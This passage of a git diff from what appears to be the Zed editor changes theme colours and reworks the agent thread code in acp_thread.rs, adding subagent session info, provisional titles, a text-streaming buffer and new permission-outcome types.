"#cbf2e4ff", + "terminal.ansi.dim_cyan": "#68a08eff", "terminal.ansi.white": "#cccac2ff", "terminal.ansi.bright_white": "#fafafaff", - "terminal.ansi.dim_white": "#898a8aff", + "terminal.ansi.dim_white": "#8e8d87ff", "link_text.hover": "#72cffeff", "conflict": "#fecf72ff", "conflict.background": "#574018ff", @@ -1067,7 +1087,7 @@ "font_weight": null }, "preproc": { - "color": "#cccac2ff", + "color": "#ffad65ff", "font_style": null, "font_weight": null }, @@ -1175,6 +1195,16 @@ "color": "#72cffeff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#aad94cff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#f07178ff", + "font_style": null, + "font_weight": null } } } diff --git a/assets/themes/gruvbox/gruvbox.json b/assets/themes/gruvbox/gruvbox.json index 16ae188712f7a800ab4fb8a81a2d24cac99da56b..4330df54fccae55e7ca077c0da9a891ee71ebe3a 100644 --- a/assets/themes/gruvbox/gruvbox.json +++ b/assets/themes/gruvbox/gruvbox.json @@ -293,7 +293,7 @@ "font_weight": null }, "preproc": { - "color": "#fbf1c7ff", + "color": "#fb4833ff", "font_style": null, "font_weight": null }, @@ -406,6 +406,16 @@ "color": "#83a598ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#b8bb26ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#fb4934ff", + "font_style": null, + "font_weight": null } } } @@ -700,7 +710,7 @@ "font_weight": null }, "preproc": { - "color": "#fbf1c7ff", + "color": "#fb4833ff", "font_style": null, "font_weight": null }, @@ -813,6 +823,16 @@ "color": "#83a598ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#b8bb26ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#fb4934ff", + "font_style": null, + "font_weight": null } } } @@ -1107,7 +1127,7 @@ "font_weight": null }, "preproc": { - "color": "#fbf1c7ff", + "color": "#fb4833ff", "font_style": null, "font_weight": null }, @@ -1220,6 +1240,16 @@ 
"color": "#83a598ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#b8bb26ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#fb4934ff", + "font_style": null, + "font_weight": null } } } @@ -1514,7 +1544,7 @@ "font_weight": null }, "preproc": { - "color": "#282828ff", + "color": "#9d0006ff", "font_style": null, "font_weight": null }, @@ -1627,6 +1657,16 @@ "color": "#0b6678ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#79740eff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#9d0006ff", + "font_style": null, + "font_weight": null } } } @@ -1921,7 +1961,7 @@ "font_weight": null }, "preproc": { - "color": "#282828ff", + "color": "#9d0006ff", "font_style": null, "font_weight": null }, @@ -2034,6 +2074,16 @@ "color": "#0b6678ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#79740eff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#9d0006ff", + "font_style": null, + "font_weight": null } } } @@ -2328,7 +2378,7 @@ "font_weight": null }, "preproc": { - "color": "#282828ff", + "color": "#9d0006ff", "font_style": null, "font_weight": null }, @@ -2441,6 +2491,16 @@ "color": "#0b6678ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#79740eff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#9d0006ff", + "font_style": null, + "font_weight": null } } } diff --git a/assets/themes/one/one.json b/assets/themes/one/one.json index 05af3f5cfeec7d4a24c4fe6d684fb21d04e2d81c..e60b6314b9595ac02bd6a43be4580ba9331ae769 100644 --- a/assets/themes/one/one.json +++ b/assets/themes/one/one.json @@ -290,7 +290,7 @@ "font_weight": null }, "preproc": { - "color": "#dce0e5ff", + "color": "#b477cfff", "font_style": null, "font_weight": null }, @@ -403,6 +403,16 @@ "color": "#73ade9ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + 
"color": "#98c379ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#e06c75ff", + "font_style": null, + "font_weight": null } } } @@ -692,7 +702,7 @@ "font_weight": null }, "preproc": { - "color": "#242529ff", + "color": "#a449abff", "font_style": null, "font_weight": null }, @@ -805,6 +815,16 @@ "color": "#5b79e3ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#50a14fff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#e45649ff", + "font_style": null, + "font_weight": null } } } diff --git a/crates/acp_thread/Cargo.toml b/crates/acp_thread/Cargo.toml index 83cf86bfafc33e4d1b520ca5af04da626831aed7..7ef53bc522708680e64cfcc9ce2860990bfd7d13 100644 --- a/crates/acp_thread/Cargo.toml +++ b/crates/acp_thread/Cargo.toml @@ -59,7 +59,5 @@ indoc.workspace = true parking_lot.workspace = true project = { workspace = true, "features" = ["test-support"] } rand.workspace = true -tempfile.workspace = true util.workspace = true settings.workspace = true -zlog.workspace = true diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index be681a846f7963950370095f50095160649d1fcd..36c9fb40c4a573e09da05618a29c1898cced60ad 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -2,55 +2,23 @@ mod connection; mod diff; mod mention; mod terminal; - -/// Key used in ACP ToolCall meta to store the tool's programmatic name. -/// This is a workaround since ACP's ToolCall doesn't have a dedicated name field. -pub const TOOL_NAME_META_KEY: &str = "tool_name"; - -/// Key used in ACP ToolCall meta to store the session id when a subagent is spawned. 
-pub const SUBAGENT_SESSION_ID_META_KEY: &str = "subagent_session_id"; - -/// Helper to extract tool name from ACP meta -pub fn tool_name_from_meta(meta: &Option) -> Option { - meta.as_ref() - .and_then(|m| m.get(TOOL_NAME_META_KEY)) - .and_then(|v| v.as_str()) - .map(|s| SharedString::from(s.to_owned())) -} - -/// Helper to extract subagent session id from ACP meta -pub fn subagent_session_id_from_meta(meta: &Option) -> Option { - meta.as_ref() - .and_then(|m| m.get(SUBAGENT_SESSION_ID_META_KEY)) - .and_then(|v| v.as_str()) - .map(|s| acp::SessionId::from(s.to_string())) -} - -/// Helper to create meta with tool name -pub fn meta_with_tool_name(tool_name: &str) -> acp::Meta { - acp::Meta::from_iter([(TOOL_NAME_META_KEY.into(), tool_name.into())]) -} -use collections::HashSet; -pub use connection::*; -pub use diff::*; -use language::language_settings::FormatOnSave; -pub use mention::*; -use project::lsp_store::{FormatTrigger, LspFormatTarget}; -use serde::{Deserialize, Serialize}; -use serde_json::to_string_pretty; - -use task::{Shell, ShellBuilder}; -pub use terminal::*; - use action_log::{ActionLog, ActionLogTelemetry}; use agent_client_protocol::{self as acp}; use anyhow::{Context as _, Result, anyhow}; +use collections::HashSet; +pub use connection::*; +pub use diff::*; use futures::{FutureExt, channel::oneshot, future::BoxFuture}; use gpui::{AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task, WeakEntity}; use itertools::Itertools; +use language::language_settings::FormatOnSave; use language::{Anchor, Buffer, BufferSnapshot, LanguageRegistry, Point, ToPoint, text_diff}; use markdown::Markdown; +pub use mention::*; +use project::lsp_store::{FormatTrigger, LspFormatTarget}; use project::{AgentLocation, Project, git_store::GitStoreCheckpoint}; +use serde::{Deserialize, Serialize}; +use serde_json::to_string_pretty; use std::collections::HashMap; use std::error::Error; use std::fmt::{Formatter, Write}; @@ -59,11 +27,53 @@ use 
std::process::ExitStatus; use std::rc::Rc; use std::time::{Duration, Instant}; use std::{fmt::Display, mem, path::PathBuf, sync::Arc}; +use task::{Shell, ShellBuilder}; +pub use terminal::*; use text::Bias; use ui::App; +use util::markdown::MarkdownEscaped; +use util::path_list::PathList; use util::{ResultExt, get_default_system_shell_preferring_bash, paths::PathStyle}; use uuid::Uuid; +/// Key used in ACP ToolCall meta to store the tool's programmatic name. +/// This is a workaround since ACP's ToolCall doesn't have a dedicated name field. +pub const TOOL_NAME_META_KEY: &str = "tool_name"; + +/// Helper to extract tool name from ACP meta +pub fn tool_name_from_meta(meta: &Option) -> Option { + meta.as_ref() + .and_then(|m| m.get(TOOL_NAME_META_KEY)) + .and_then(|v| v.as_str()) + .map(|s| SharedString::from(s.to_owned())) +} + +/// Helper to create meta with tool name +pub fn meta_with_tool_name(tool_name: &str) -> acp::Meta { + acp::Meta::from_iter([(TOOL_NAME_META_KEY.into(), tool_name.into())]) +} + +/// Key used in ACP ToolCall meta to store the session id and message indexes +pub const SUBAGENT_SESSION_INFO_META_KEY: &str = "subagent_session_info"; + +#[derive(Clone, Debug, Deserialize, Serialize)] +pub struct SubagentSessionInfo { + /// The session id of the subagent sessiont that was spawned + pub session_id: acp::SessionId, + /// The index of the message of the start of the "turn" run by this tool call + pub message_start_index: usize, + /// The index of the output of the message that the subagent has returned + #[serde(skip_serializing_if = "Option::is_none")] + pub message_end_index: Option, +} + +/// Helper to extract subagent session id from ACP meta +pub fn subagent_session_info_from_meta(meta: &Option) -> Option { + meta.as_ref() + .and_then(|m| m.get(SUBAGENT_SESSION_INFO_META_KEY)) + .and_then(|v| serde_json::from_value(v.clone()).ok()) +} + #[derive(Debug)] pub struct UserMessage { pub id: Option, @@ -150,6 +160,7 @@ pub enum AgentThreadEntry { 
UserMessage(UserMessage), AssistantMessage(AssistantMessage), ToolCall(ToolCall), + CompletedPlan(Vec), } impl AgentThreadEntry { @@ -158,6 +169,7 @@ impl AgentThreadEntry { Self::UserMessage(message) => message.indented, Self::AssistantMessage(message) => message.indented, Self::ToolCall(_) => false, + Self::CompletedPlan(_) => false, } } @@ -166,6 +178,14 @@ impl AgentThreadEntry { Self::UserMessage(message) => message.to_markdown(cx), Self::AssistantMessage(message) => message.to_markdown(cx), Self::ToolCall(tool_call) => tool_call.to_markdown(cx), + Self::CompletedPlan(entries) => { + let mut md = String::from("## Plan\n\n"); + for entry in entries { + let source = entry.content.read(cx).source().to_string(); + md.push_str(&format!("- [x] {}\n", source)); + } + md + } } } @@ -223,7 +243,7 @@ pub struct ToolCall { pub raw_input_markdown: Option>, pub raw_output: Option, pub tool_name: Option, - pub subagent_session_id: Option, + pub subagent_session_info: Option, } impl ToolCall { @@ -237,6 +257,8 @@ impl ToolCall { ) -> Result { let title = if tool_call.kind == acp::ToolKind::Execute { tool_call.title + } else if tool_call.kind == acp::ToolKind::Edit { + MarkdownEscaped(tool_call.title.as_str()).to_string() } else if let Some((first_line, _)) = tool_call.title.split_once("\n") { first_line.to_owned() + "…" } else { @@ -262,7 +284,7 @@ impl ToolCall { let tool_name = tool_name_from_meta(&tool_call.meta); - let subagent_session = subagent_session_id_from_meta(&tool_call.meta); + let subagent_session_info = subagent_session_info_from_meta(&tool_call.meta); let result = Self { id: tool_call.tool_call_id, @@ -277,7 +299,7 @@ impl ToolCall { raw_input_markdown, raw_output: tool_call.raw_output, tool_name, - subagent_session_id: subagent_session, + subagent_session_info, }; Ok(result) } @@ -310,8 +332,8 @@ impl ToolCall { self.status = status.into(); } - if let Some(subagent_session_id) = subagent_session_id_from_meta(&meta) { - self.subagent_session_id = 
Some(subagent_session_id); + if let Some(subagent_session_info) = subagent_session_info_from_meta(&meta) { + self.subagent_session_info = Some(subagent_session_info); } if let Some(title) = title { @@ -325,6 +347,8 @@ impl ToolCall { self.label.update(cx, |label, cx| { if self.kind == acp::ToolKind::Execute { label.replace(title, cx); + } else if self.kind == acp::ToolKind::Edit { + label.replace(MarkdownEscaped(&title).to_string(), cx) } else if let Some((first_line, _)) = title.split_once("\n") { label.replace(first_line.to_owned() + "…", cx); } else { @@ -402,7 +426,7 @@ impl ToolCall { pub fn is_subagent(&self) -> bool { self.tool_name.as_ref().is_some_and(|s| s == "spawn_agent") - || self.subagent_session_id.is_some() + || self.subagent_session_info.is_some() } pub fn to_markdown(&self, cx: &App) -> String { @@ -480,6 +504,54 @@ impl From<&ResolvedLocation> for AgentLocation { } } +#[derive(Debug, Clone)] +pub enum SelectedPermissionParams { + Terminal { patterns: Vec }, +} + +#[derive(Debug)] +pub struct SelectedPermissionOutcome { + pub option_id: acp::PermissionOptionId, + pub option_kind: acp::PermissionOptionKind, + pub params: Option, +} + +impl SelectedPermissionOutcome { + pub fn new(option_id: acp::PermissionOptionId, option_kind: acp::PermissionOptionKind) -> Self { + Self { + option_id, + option_kind, + params: None, + } + } + + pub fn params(mut self, params: Option) -> Self { + self.params = params; + self + } +} + +impl From for acp::SelectedPermissionOutcome { + fn from(value: SelectedPermissionOutcome) -> Self { + Self::new(value.option_id) + } +} + +#[derive(Debug)] +pub enum RequestPermissionOutcome { + Cancelled, + Selected(SelectedPermissionOutcome), +} + +impl From for acp::RequestPermissionOutcome { + fn from(value: RequestPermissionOutcome) -> Self { + match value { + RequestPermissionOutcome::Cancelled => Self::Cancelled, + RequestPermissionOutcome::Selected(outcome) => Self::Selected(outcome.into()), + } + } +} + #[derive(Debug)] pub 
enum ToolCallStatus { /// The tool call hasn't started running yet, but we start showing it to @@ -488,7 +560,7 @@ pub enum ToolCallStatus { /// The tool call is waiting for confirmation from the user. WaitingForConfirmation { options: PermissionOptions, - respond_tx: oneshot::Sender, + respond_tx: oneshot::Sender, }, /// The tool call is currently running. InProgress, @@ -858,6 +930,7 @@ impl Plan { } acp::PlanEntryStatus::InProgress => { stats.in_progress_entry = stats.in_progress_entry.or(Some(entry)); + stats.pending += 1; } acp::PlanEntryStatus::Completed => { stats.completed += 1; @@ -944,8 +1017,11 @@ struct RunningTurn { } pub struct AcpThread { + session_id: acp::SessionId, + work_dirs: Option, parent_session_id: Option, - title: SharedString, + title: Option, + provisional_title: Option, entries: Vec, plan: Plan, project: Entity, @@ -954,14 +1030,42 @@ pub struct AcpThread { turn_id: u32, running_turn: Option, connection: Rc, - session_id: acp::SessionId, token_usage: Option, prompt_capabilities: acp::PromptCapabilities, + available_commands: Vec, _observe_prompt_capabilities: Task>, terminals: HashMap>, pending_terminal_output: HashMap>>, pending_terminal_exit: HashMap, had_error: bool, + /// The user's unsent prompt text, persisted so it can be restored when reloading the thread. + draft_prompt: Option>, + /// The initial scroll position for the thread view, set during session registration. + ui_scroll_position: Option, + /// Buffer for smooth text streaming. Holds text that has been received from + /// the model but not yet revealed in the UI. A timer task drains this buffer + /// gradually to create a fluid typing effect instead of choppy chunk-at-a-time + /// updates. + streaming_text_buffer: Option, +} + +struct StreamingTextBuffer { + /// Text received from the model but not yet appended to the Markdown source. + pending: String, + /// The number of bytes to reveal per timer turn. 
+ bytes_to_reveal_per_tick: usize, + /// The Markdown entity being streamed into. + target: Entity, + /// Timer task that periodically moves text from `pending` into `source`. + _reveal_task: Task<()>, +} + +impl StreamingTextBuffer { + /// The number of milliseconds between each timer tick, controlling how quickly + /// text is revealed. + const TASK_UPDATE_MS: u64 = 16; + /// The time in milliseconds to reveal the entire pending text. + const REVEAL_TARGET: f32 = 200.0; } impl From<&AcpThread> for ActionLogTelemetry { @@ -992,6 +1096,7 @@ pub enum AcpThreadEvent { AvailableCommandsUpdated(Vec), ModeUpdated(acp::SessionModeId), ConfigOptionsUpdated(Vec), + WorkingDirectoriesUpdated, } impl EventEmitter for AcpThread {} @@ -1035,87 +1140,6 @@ pub enum TerminalProviderCommand { }, } -impl AcpThread { - pub fn on_terminal_provider_event( - &mut self, - event: TerminalProviderEvent, - cx: &mut Context, - ) { - match event { - TerminalProviderEvent::Created { - terminal_id, - label, - cwd, - output_byte_limit, - terminal, - } => { - let entity = self.register_terminal_created( - terminal_id.clone(), - label, - cwd, - output_byte_limit, - terminal, - cx, - ); - - if let Some(mut chunks) = self.pending_terminal_output.remove(&terminal_id) { - for data in chunks.drain(..) 
{ - entity.update(cx, |term, cx| { - term.inner().update(cx, |inner, cx| { - inner.write_output(&data, cx); - }) - }); - } - } - - if let Some(_status) = self.pending_terminal_exit.remove(&terminal_id) { - entity.update(cx, |_term, cx| { - cx.notify(); - }); - } - - cx.notify(); - } - TerminalProviderEvent::Output { terminal_id, data } => { - if let Some(entity) = self.terminals.get(&terminal_id) { - entity.update(cx, |term, cx| { - term.inner().update(cx, |inner, cx| { - inner.write_output(&data, cx); - }) - }); - } else { - self.pending_terminal_output - .entry(terminal_id) - .or_default() - .push(data); - } - } - TerminalProviderEvent::TitleChanged { terminal_id, title } => { - if let Some(entity) = self.terminals.get(&terminal_id) { - entity.update(cx, |term, cx| { - term.inner().update(cx, |inner, cx| { - inner.breadcrumb_text = title; - cx.emit(::terminal::Event::BreadcrumbsChanged); - }) - }); - } - } - TerminalProviderEvent::Exit { - terminal_id, - status, - } => { - if let Some(entity) = self.terminals.get(&terminal_id) { - entity.update(cx, |_term, cx| { - cx.notify(); - }); - } else { - self.pending_terminal_exit.insert(terminal_id, status); - } - } - } - } -} - #[derive(PartialEq, Eq, Debug)] pub enum ThreadStatus { Idle, @@ -1161,7 +1185,8 @@ impl Error for LoadError {} impl AcpThread { pub fn new( parent_session_id: Option, - title: impl Into, + title: Option, + work_dirs: Option, connection: Rc, project: Entity, action_log: Entity, @@ -1182,11 +1207,13 @@ impl AcpThread { Self { parent_session_id, + work_dirs, action_log, shared_buffers: Default::default(), entries: Default::default(), plan: Default::default(), - title: title.into(), + title, + provisional_title: None, project, running_turn: None, turn_id: 0, @@ -1194,11 +1221,15 @@ impl AcpThread { session_id, token_usage: None, prompt_capabilities, + available_commands: Vec::new(), _observe_prompt_capabilities: task, terminals: HashMap::default(), pending_terminal_output: HashMap::default(), 
pending_terminal_exit: HashMap::default(), had_error: false, + draft_prompt: None, + ui_scroll_position: None, + streaming_text_buffer: None, } } @@ -1210,6 +1241,26 @@ impl AcpThread { self.prompt_capabilities.clone() } + pub fn available_commands(&self) -> &[acp::AvailableCommand] { + &self.available_commands + } + + pub fn draft_prompt(&self) -> Option<&[acp::ContentBlock]> { + self.draft_prompt.as_deref() + } + + pub fn set_draft_prompt(&mut self, prompt: Option>) { + self.draft_prompt = prompt; + } + + pub fn ui_scroll_position(&self) -> Option { + self.ui_scroll_position + } + + pub fn set_ui_scroll_position(&mut self, position: Option) { + self.ui_scroll_position = position; + } + pub fn connection(&self) -> &Rc { &self.connection } @@ -1222,8 +1273,14 @@ impl AcpThread { &self.project } - pub fn title(&self) -> SharedString { - self.title.clone() + pub fn title(&self) -> Option { + self.title + .clone() + .or_else(|| self.provisional_title.clone()) + } + + pub fn has_provisional_title(&self) -> bool { + self.provisional_title.is_some() } pub fn entries(&self) -> &[AgentThreadEntry] { @@ -1234,6 +1291,15 @@ impl AcpThread { &self.session_id } + pub fn work_dirs(&self) -> Option<&PathList> { + self.work_dirs.as_ref() + } + + pub fn set_work_dirs(&mut self, work_dirs: PathList, cx: &mut Context) { + self.work_dirs = Some(work_dirs); + cx.emit(AcpThreadEvent::WorkingDirectoriesUpdated) + } + pub fn status(&self) -> ThreadStatus { if self.running_turn.is_some() { ThreadStatus::Generating @@ -1254,7 +1320,9 @@ impl AcpThread { status: ToolCallStatus::WaitingForConfirmation { .. }, .. 
}) => return true, - AgentThreadEntry::ToolCall(_) | AgentThreadEntry::AssistantMessage(_) => {} + AgentThreadEntry::ToolCall(_) + | AgentThreadEntry::AssistantMessage(_) + | AgentThreadEntry::CompletedPlan(_) => {} } } false @@ -1276,7 +1344,9 @@ impl AcpThread { ) if call.diffs().next().is_some() => { return true; } - AgentThreadEntry::ToolCall(_) | AgentThreadEntry::AssistantMessage(_) => {} + AgentThreadEntry::ToolCall(_) + | AgentThreadEntry::AssistantMessage(_) + | AgentThreadEntry::CompletedPlan(_) => {} } } @@ -1293,7 +1363,9 @@ impl AcpThread { }) => { return true; } - AgentThreadEntry::ToolCall(_) | AgentThreadEntry::AssistantMessage(_) => {} + AgentThreadEntry::ToolCall(_) + | AgentThreadEntry::AssistantMessage(_) + | AgentThreadEntry::CompletedPlan(_) => {} } } @@ -1304,7 +1376,9 @@ impl AcpThread { for entry in self.entries.iter().rev() { match entry { AgentThreadEntry::UserMessage(..) => return false, - AgentThreadEntry::AssistantMessage(..) => continue, + AgentThreadEntry::AssistantMessage(..) | AgentThreadEntry::CompletedPlan(..) => { + continue; + } AgentThreadEntry::ToolCall(..) => return true, } } @@ -1336,10 +1410,25 @@ impl AcpThread { acp::SessionUpdate::Plan(plan) => { self.update_plan(plan, cx); } + acp::SessionUpdate::SessionInfoUpdate(info_update) => { + if let acp::MaybeUndefined::Value(title) = info_update.title { + let had_provisional = self.provisional_title.take().is_some(); + let title: SharedString = title.into(); + if self.title.as_ref() != Some(&title) { + self.title = Some(title); + cx.emit(AcpThreadEvent::TitleUpdated); + } else if had_provisional { + cx.emit(AcpThreadEvent::TitleUpdated); + } + } + } acp::SessionUpdate::AvailableCommandsUpdate(acp::AvailableCommandsUpdate { available_commands, .. 
- }) => cx.emit(AcpThreadEvent::AvailableCommandsUpdated(available_commands)), + }) => { + self.available_commands = available_commands.clone(); + cx.emit(AcpThreadEvent::AvailableCommandsUpdated(available_commands)); + } acp::SessionUpdate::CurrentModeUpdate(acp::CurrentModeUpdate { current_mode_id, .. @@ -1383,6 +1472,7 @@ impl AcpThread { }) = last_entry && *existing_indented == indented { + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); *id = message_id.or(id.take()); content.append(chunk.clone(), &language_registry, path_style, cx); chunks.push(chunk); @@ -1419,8 +1509,20 @@ impl AcpThread { indented: bool, cx: &mut Context, ) { - let language_registry = self.project.read(cx).languages().clone(); let path_style = self.project.read(cx).path_style(cx); + + // For text chunks going to an existing Markdown block, buffer for smooth + // streaming instead of appending all at once which may feel more choppy. + if let acp::ContentBlock::Text(text_content) = &chunk { + if let Some(markdown) = self.streaming_markdown_target(is_thought, indented) { + let entries_len = self.entries.len(); + cx.emit(AcpThreadEvent::EntryUpdated(entries_len - 1)); + self.buffer_streaming_text(&markdown, text_content.text.clone(), cx); + return; + } + } + + let language_registry = self.project.read(cx).languages().clone(); let entries_len = self.entries.len(); if let Some(last_entry) = self.entries.last_mut() && let AgentThreadEntry::AssistantMessage(AssistantMessage { @@ -1431,6 +1533,7 @@ impl AcpThread { && *existing_indented == indented { let idx = entries_len - 1; + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); cx.emit(AcpThreadEvent::EntryUpdated(idx)); match (chunks.last_mut(), is_thought) { (Some(AssistantMessageChunk::Message { block }), false) @@ -1465,7 +1568,134 @@ impl AcpThread { } } + fn streaming_markdown_target( + &self, + is_thought: bool, + indented: bool, + ) -> Option> { + let last_entry = self.entries.last()?; + if let 
AgentThreadEntry::AssistantMessage(AssistantMessage { + chunks, + indented: existing_indented, + .. + }) = last_entry + && *existing_indented == indented + && let [.., chunk] = chunks.as_slice() + { + match (chunk, is_thought) { + ( + AssistantMessageChunk::Message { + block: ContentBlock::Markdown { markdown }, + }, + false, + ) + | ( + AssistantMessageChunk::Thought { + block: ContentBlock::Markdown { markdown }, + }, + true, + ) => Some(markdown.clone()), + _ => None, + } + } else { + None + } + } + + /// Add text to the streaming buffer. If the target changed (e.g. switching + /// from thoughts to message text), flush the old buffer first. + fn buffer_streaming_text( + &mut self, + markdown: &Entity, + text: String, + cx: &mut Context, + ) { + if let Some(buffer) = &mut self.streaming_text_buffer { + if buffer.target.entity_id() == markdown.entity_id() { + buffer.pending.push_str(&text); + + buffer.bytes_to_reveal_per_tick = (buffer.pending.len() as f32 + / StreamingTextBuffer::REVEAL_TARGET + * StreamingTextBuffer::TASK_UPDATE_MS as f32) + .ceil() as usize; + return; + } + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); + } + + let target = markdown.clone(); + let _reveal_task = self.start_streaming_reveal(cx); + let pending_len = text.len(); + let bytes_to_reveal = (pending_len as f32 / StreamingTextBuffer::REVEAL_TARGET + * StreamingTextBuffer::TASK_UPDATE_MS as f32) + .ceil() as usize; + self.streaming_text_buffer = Some(StreamingTextBuffer { + pending: text, + bytes_to_reveal_per_tick: bytes_to_reveal, + target, + _reveal_task, + }); + } + + /// Flush all buffered streaming text into the Markdown entity immediately. 
+ fn flush_streaming_text( + streaming_text_buffer: &mut Option, + cx: &mut Context, + ) { + if let Some(buffer) = streaming_text_buffer.take() { + if !buffer.pending.is_empty() { + buffer + .target + .update(cx, |markdown, cx| markdown.append(&buffer.pending, cx)); + } + } + } + + /// Spawns a foreground task that periodically drains + /// `streaming_text_buffer.pending` into the target `Markdown` entity, + /// producing smooth, continuous text output. + fn start_streaming_reveal(&self, cx: &mut Context) -> Task<()> { + cx.spawn(async move |this, cx| { + loop { + cx.background_executor() + .timer(Duration::from_millis(StreamingTextBuffer::TASK_UPDATE_MS)) + .await; + + let should_continue = this + .update(cx, |this, cx| { + let Some(buffer) = &mut this.streaming_text_buffer else { + return false; + }; + + if buffer.pending.is_empty() { + return true; + } + + let pending_len = buffer.pending.len(); + + let byte_boundary = buffer + .pending + .ceil_char_boundary(buffer.bytes_to_reveal_per_tick) + .min(pending_len); + + buffer.target.update(cx, |markdown: &mut Markdown, cx| { + markdown.append(&buffer.pending[..byte_boundary], cx); + buffer.pending.drain(..byte_boundary); + }); + + true + }) + .unwrap_or(false); + + if !should_continue { + break; + } + } + }) + } + fn push_entry(&mut self, entry: AgentThreadEntry, cx: &mut Context) { + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); self.entries.push(entry); cx.emit(AcpThreadEvent::NewEntry); } @@ -1475,16 +1705,29 @@ impl AcpThread { } pub fn set_title(&mut self, title: SharedString, cx: &mut Context) -> Task> { - if title != self.title { - self.title = title.clone(); + let had_provisional = self.provisional_title.take().is_some(); + if self.title.as_ref() != Some(&title) { + self.title = Some(title.clone()); cx.emit(AcpThreadEvent::TitleUpdated); if let Some(set_title) = self.connection.set_title(&self.session_id, cx) { return set_title.run(title, cx); } + } else if had_provisional { + 
cx.emit(AcpThreadEvent::TitleUpdated); } Task::ready(Ok(())) } + /// Sets a provisional display title without propagating back to the + /// underlying agent connection. This is used for quick preview titles + /// (e.g. first 20 chars of the user message) that should be shown + /// immediately but replaced once the LLM generates a proper title via + /// `set_title`. + pub fn set_provisional_title(&mut self, title: SharedString, cx: &mut Context) { + self.provisional_title = Some(title); + cx.emit(AcpThreadEvent::TitleUpdated); + } + pub fn subagent_spawned(&mut self, session_id: acp::SessionId, cx: &mut Context) { cx.emit(AcpThreadEvent::SubagentSpawned(session_id)); } @@ -1528,7 +1771,7 @@ impl AcpThread { raw_input_markdown: None, raw_output: None, tool_name: None, - subagent_session_id: None, + subagent_session_info: None, }; self.push_entry(AgentThreadEntry::ToolCall(failed_tool_call), cx); return Ok(()); @@ -1592,6 +1835,7 @@ impl AcpThread { let agent_telemetry_id = self.connection().telemetry_id(); let session = self.session_id(); + let parent_session_id = self.parent_session_id(); if let ToolCallStatus::Completed | ToolCallStatus::Failed = status { let status = if matches!(status, ToolCallStatus::Completed) { "completed" @@ -1602,6 +1846,7 @@ impl AcpThread { "Agent Tool Call Completed", agent_telemetry_id, session, + parent_session_id, status ); } @@ -1690,10 +1935,14 @@ impl AcpThread { pub fn tool_call_for_subagent(&self, session_id: &acp::SessionId) -> Option<&ToolCall> { self.entries.iter().find_map(|entry| match entry { - AgentThreadEntry::ToolCall(tool_call) - if tool_call.subagent_session_id.as_ref() == Some(session_id) => - { - Some(tool_call) + AgentThreadEntry::ToolCall(tool_call) => { + if let Some(subagent_session_info) = &tool_call.subagent_session_info + && &subagent_session_info.session_id == session_id + { + Some(tool_call) + } else { + None + } } _ => None, }) @@ -1701,6 +1950,7 @@ impl AcpThread { pub fn resolve_locations(&mut self, id: 
acp::ToolCallId, cx: &mut Context) { let project = self.project.clone(); + let should_update_agent_location = self.parent_session_id.is_none(); let Some((_, tool_call)) = self.tool_call_mut(&id) else { return; }; @@ -1736,7 +1986,7 @@ impl AcpThread { } else { false }; - if !should_ignore { + if !should_ignore && should_update_agent_location { project.set_agent_location(Some(location.into()), cx); } }); @@ -1761,7 +2011,7 @@ impl AcpThread { tool_call: acp::ToolCallUpdate, options: PermissionOptions, cx: &mut Context, - ) -> Result> { + ) -> Result> { let (tx, rx) = oneshot::channel(); let status = ToolCallStatus::WaitingForConfirmation { @@ -1777,10 +2027,8 @@ impl AcpThread { Ok(cx.spawn(async move |this, cx| { let outcome = match rx.await { - Ok(option) => acp::RequestPermissionOutcome::Selected( - acp::SelectedPermissionOutcome::new(option), - ), - Err(oneshot::Canceled) => acp::RequestPermissionOutcome::Cancelled, + Ok(outcome) => RequestPermissionOutcome::Selected(outcome), + Err(oneshot::Canceled) => RequestPermissionOutcome::Cancelled, }; this.update(cx, |_this, cx| { cx.emit(AcpThreadEvent::ToolAuthorizationReceived(tool_call_id)) @@ -1793,15 +2041,14 @@ impl AcpThread { pub fn authorize_tool_call( &mut self, id: acp::ToolCallId, - option_id: acp::PermissionOptionId, - option_kind: acp::PermissionOptionKind, + outcome: SelectedPermissionOutcome, cx: &mut Context, ) { let Some((ix, call)) = self.tool_call_mut(&id) else { return; }; - let new_status = match option_kind { + let new_status = match outcome.option_kind { acp::PermissionOptionKind::RejectOnce | acp::PermissionOptionKind::RejectAlways => { ToolCallStatus::Rejected } @@ -1814,7 +2061,7 @@ impl AcpThread { let curr_status = mem::replace(&mut call.status, new_status); if let ToolCallStatus::WaitingForConfirmation { respond_tx, .. 
